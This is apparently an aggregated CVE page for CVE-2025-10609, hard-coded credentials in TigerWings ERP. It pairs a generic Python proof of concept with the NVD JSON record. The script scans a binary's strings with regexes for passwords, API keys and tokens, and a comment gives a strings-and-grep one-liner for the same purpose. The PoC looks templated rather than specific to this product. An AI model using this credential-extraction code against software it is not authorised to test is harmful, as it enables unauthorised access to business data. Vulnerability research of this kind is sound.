CVE-2025-10609

# CVE-2025-10609 - TigerWings ERP Hard-coded Credentials PoC # This PoC demonstrates how to extract hard-coded credentials from TigerWings ERP executable import re import sys def search_hardcoded_credentials(executable_path): """ Search for hard-coded credentials in the TigerWings ERP executable file. This simulates extracting sensitive constants from the binary. """ # Common patterns for hard-coded credentials credential_patterns = [ r'password\s*=\s*["\']([^"\']+)["\']', r'passwd\s*=\s*["\']([^"\']+)["\']', r'pwd\s*=\s*["\']([^"\']+)["\']', r'user\s*=\s*["\']([^"\']+)["\']', r'username\s*=\s*["\']([^"\']+)["\']', r'api_key\s*=\s*["\']([^"\']+)["\']', r'secret\s*=\s*["\']([^"\']+)["\']', r'token\s*=\s*["\']([^"\']+)["\']', r'connection_string\s*=\s*["\']([^"\']+)["\']', ] found_credentials = [] try: with open(executable_path, 'rb') as f: content = f.read() # Search for readable strings in the binary strings = re.findall(b'[\x20-\x7e]{8,}', content) for s in strings: decoded = s.decode('ascii', errors='ignore') for pattern in credential_patterns: matches = re.findall(pattern, decoded, re.IGNORECASE) for match in matches: found_credentials.append({ 'type': pattern.split('\\s')[0], 'value': match }) except FileNotFoundError: print(f"Error: File '{executable_path}' not found.") return [] except Exception as e: print(f"Error analyzing file: {e}") return [] return found_credentials def demonstrate_exploitation(credentials): """ Demonstrate how extracted credentials could be used to access the system. """ if not credentials: print("No hard-coded credentials found.") return print("[+] Found hard-coded credentials:") for i, cred in enumerate(credentials, 1): print(f" [{i}] {cred['type']}: {cred['value']}") print("\n[!] These credentials could be used to:") print(" - Authenticate to TigerWings ERP system") print(" - Access sensitive business data") print(" - Modify financial records and business data") print(" - Escalate privileges within the system") if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <path_to_tigerwings_executable>") print("Example: python3 poc.py /path/to/TigerWingsERP.exe") sys.exit(1) exe_path = sys.argv[1] credentials = search_hardcoded_credentials(exe_path) demonstrate_exploitation(credentials) # Alternative manual approach using command line tools: # strings TigerWingsERP.exe | grep -iE "password|passwd|pwd|user|secret|key|token" # Or use a hex editor to search for credential patterns in the binary.

{"cve": {"id": "CVE-2025-10609", "sourceIdentifier": "[email protected]", "published": "2025-10-03T13:15:45.633", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of Hard-coded Credentials vulnerability in Logo Software Inc. TigerWings ERP allows Read Sensitive Constants Within an Executable.This issue affects TigerWings ERP: from 01.01.00 before 3.03.00."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.7, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0313", "source": "[email protected]"}]}}